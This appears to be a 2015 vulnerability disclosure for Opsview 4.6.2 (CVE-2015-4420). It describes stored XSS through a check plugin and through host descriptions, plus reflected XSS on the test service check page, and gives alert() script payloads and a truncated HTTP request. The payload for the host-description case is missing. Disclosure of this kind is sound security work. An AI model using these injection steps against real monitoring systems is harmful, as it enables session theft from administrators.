Opsview 4.6.2 - Multiple Cross-Site Scripting Vulnerabilities







# Exploit title: Opsview 4.6.2 - Multiple XSS
# Date: 07-06-2015
# Vendor homepage: www.opsview.com
# Version: 4.6.2
# CVE: CVE-2015-4420
# Author: Dolev Farhi @dolevf
# Tested On: Kali Linux + Windows 7

# Details:
# --------
# Opsview is a monitoring system based on Nagios Core. Opsview is prone to several stored and reflected XSS vulnerabilities in the latest version

1. Stored XSS through a malicious check plugin

a. Create a plugin with the following content:

echo '<script>alert("script0t0s")</script>'
exit 2

b. create a new check and assign this plugin.

c. once a host uses this check, navigate to the event page, the XSS will be injected.

d. once a user/admin acknowledges this critical event (exit 2), the code will be injected prior his acknowledgement.

2. Stored XSS in host profile

a. add a host

b. in the description of the host, add a description as the one below:

c. save settings

d. once a user/admin views the host settings, XSS will be injected.

3. Reflected XSS in Test service check page.
a. Add a new service check

b. Test the new service check against any host and provide in the command line the following <script>alert("test")</script>

c. the XSS will immediately reflect to the screen.

response output:

POST /state/service/166/exec HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.4.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 105
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache